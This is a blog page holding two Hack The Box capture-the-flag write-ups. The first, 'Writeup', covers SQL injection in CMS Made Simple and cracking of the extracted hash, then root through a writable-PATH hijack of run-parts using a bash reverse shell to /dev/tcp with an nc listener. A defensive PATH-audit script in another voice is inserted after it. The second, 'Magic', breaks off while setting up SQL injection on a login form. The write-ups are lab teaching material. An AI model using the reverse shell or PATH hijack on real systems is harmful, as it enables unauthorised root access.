
Wednesday, December 30, 2020

Hackthebox Writeup




User

As always, I started with an nmap scan which revealed two ports open, port 22 (SSH) and port 80 (HTTP).


Visiting port 80 showed a very simple page and nothing else. No links, nothing. Well, except for a warning that I’d be banned if I hit a lot of 404 pages, so no gobuster or similar brute forcing was going to work here.


Fortunately, checking robots.txt gave me something to work on, as it didn’t want me to visit /writeup. Which is exactly what I did!
There wasn’t much of interest in /writeup, but wappalyzer (a Firefox plugin) identified the software running as ‘CMS Made Simple’, for which exploit-db has several exploits.
I found an SQL injection exploit which didn’t need any valid credentials, and since I wasn’t able to identify the version of CMS Made Simple running, I decided to give it a try.
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
Within a short time the exploit had extracted a username, and the salt and hash for the password. Using hashcat with mode 20 (md5($salt.$pass)) I got the password ‘raykayjay9’ which allowed me to log in via SSH and grab the user flag.

root

For root, I did the usual and fetched LinEnum and pspy and ran them. I didn’t initially notice anything with these tools, so I ran pspy with the parameters -fp to see all file system events.
When someone ssh’d into the box, sshd would call run-parts without a specific path, looking in the following dirs in the PATH variable:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Checking if any of these directories were writable showed that both /usr/local/sbin and /usr/local/bin were. So what would happen if I were to put an executable script called ‘run-parts’ into either of the above dirs?
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/9001 0>&1
After running chmod +x to make the above script executable, I started a netcat listener:

nc -lvnp 9001
All I had to do was log in via SSH again, and I had a reverse root shell and could grab the root flag!
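The root step above works because a writable directory sits ahead of the real run-parts in sshd's PATH. As an added audit check (not part of the original writeup; function names are my own), this POSIX shell script lists, for a given command and PATH string, every writable directory that is searched before the directory holding the real binary:

```shell
#!/bin/sh
# Added audit helper, not part of the original writeup: given a command name
# and a PATH string, print every directory that (a) is searched BEFORE the one
# holding the real executable and (b) is writable by the current user.
# Each printed directory is a place where a same-named file would shadow the
# real command for any process resolving it through this PATH, which is the
# misconfiguration behind the run-parts finding above. Prints nothing if safe.
path_shadow_dirs() {
    cmd=$1
    searchpath=$2
    oldifs=$IFS
    IFS=:
    for dir in $searchpath; do
        [ -n "$dir" ] || continue            # skip empty entries ("::")
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            break                            # real binary found; later dirs cannot shadow it
        fi
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$dir"
        fi
    done
    IFS=$oldifs
}

# Wrapper for cron/CI use: returns 1 if any shadowing directory exists, else 0.
# Defaults to the caller's own PATH when no second argument is given.
check_path_shadowing() {
    hits=$(path_shadow_dirs "$1" "${2:-$PATH}")
    if [ -n "$hits" ]; then
        printf 'WARNING: %s can be shadowed from writable dir(s):\n%s\n' "$1" "$hits"
        return 1
    fi
    return 0
}

# Run directly with a command name, e.g.: ./path_audit.sh run-parts
# (the PATH to audit should be the one the privileged service actually uses,
# e.g. the value shown in the writeup, passed as the second argument)
if [ $# -ge 1 ]; then
    check_path_shadowing "$1" "${2:-}"
fi
```

Run it with the PATH value observed for the privileged process rather than your own shell's, since the two often differ.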


Tuesday, December 29, 2020

Magic Hackthebox

 



Welcome, readers. Today we will be doing the Hack The Box (HTB) challenge Magic.

Enumeration

Starting off with a little nmap, we see SSH and HTTP open.

root@kali:~/Documents/HackTheBox/Magic# nmap -Pn -sS -n -p1-10000 -T4 -sV 10.10.10.185 -vv
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
...
A quick check for OpenSSH v7.6p1 vulnerabilities doesn’t seem to give us anything, so let’s move on to port 80.
At first glance, there are just a bunch of images on the site - nothing too interesting. Of note in the source code, however, are references to images located in images/uploads. This will be useful later.



Next, in the bottom left corner there is a login button which will presumably let us upload images, so let’s try that.


Foothold

Now, we are presented with a very simple login dialog box. The login process appears to be pretty standard in that it POSTs a username and password to the PHP backend.



Since we don’t know the username or password, let’s try SQL injection in both fields. The idea here is that the PHP code in the back may look something like this:

...

